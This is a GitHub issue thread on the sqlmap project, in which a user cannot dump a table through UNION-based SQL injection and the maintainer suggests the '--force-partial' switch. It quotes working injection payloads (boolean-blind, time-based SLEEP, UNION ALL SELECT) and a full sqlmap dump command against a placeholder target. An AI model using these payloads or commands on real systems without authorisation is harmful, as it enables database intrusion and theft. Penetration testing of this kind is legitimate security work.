### ISSUE TITLE
Problem retrieving data with UNION query

### ISSUE THREAD

**Issue by turboman99maker** [sqlmapproject/sqlmap#5633]
**Describe the bug**
In a case of a single vulnerability and 3 differents types of injection, i'm not able to retrieve data with the UNION query method.

**Target and vulnerability**
```
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://www.target.com/content.php?date=2016/06/08&param1=-9318' OR 1489=1489 AND 'OKZE'='OKZE&param2=Game
    Vector: OR [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload:  http://www.target.com/content.php?date=2016/06/08&param1=1' OR (SELECT 7499 FROM (SELECT(SLEEP(500)))qSHV) AND 'JogL'='JogL&param2=Game
    Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload:  http://www.target.com/content.php?date=2016/06/08&param1=1' UNION ALL SELECT CONCAT(0x717a7a6271,0x626c454a716d4676747273586c655454464979724c73556a59676e67437a73737458545877617661,0x716a6a6a71),43,43,43,43,43,43,43,43,43,43-- -&param2=Game
    Vector:  UNION ALL SELECT [QUERY],43,43,43,43,43,43,43,43,43,43-- -
---
```

**Tests**
`sqlmap.py -u "http://www.target.com/content.php?date=2016/06/08&param1=1*&param2=Game" -D database01 -T transaction -C id --dump --technique=U`
There is some problem when i try to dump data with the UNION query type. The `-v3` options shows clearly that a `HTTP error code: 408 ('Request Time-out')` enters in count. Too many errors that obviously stop the retrieval. I thought that it was due to the high volume of data (id>95000) so i decided to reduce the number of threads and put a higher value on `--time-sec` parameter. Without success. Could it be a WAF as sqlmap supposed ? Maybe the payload ? I don't know. Tried also with the `--no-cast` option but (again) without success.
**I can retrieve data** with the 2 others injection type without too many problems.

**Running environment:**
 - sqlmap 1.8.2-1
- Microsoft Windows 11
 - Python version 3.12.2

**Target details:**
- web server operating system: Windows 2008 R2 or 7
- web application technology: Microsoft IIS 7.5, PHP 5.5.15, PHP
- back-end DBMS: MySQL >= 5.0.12
- banner: '5.6.51'

Thanks for your help and all the work done with that beautiful pentest tool.

**Comment by stamparm** [comment]
try to use `--force-partial` (hidden switch to force partial-UNION retrieval - i.e. one by one row, instead of the full table dumps in one request)
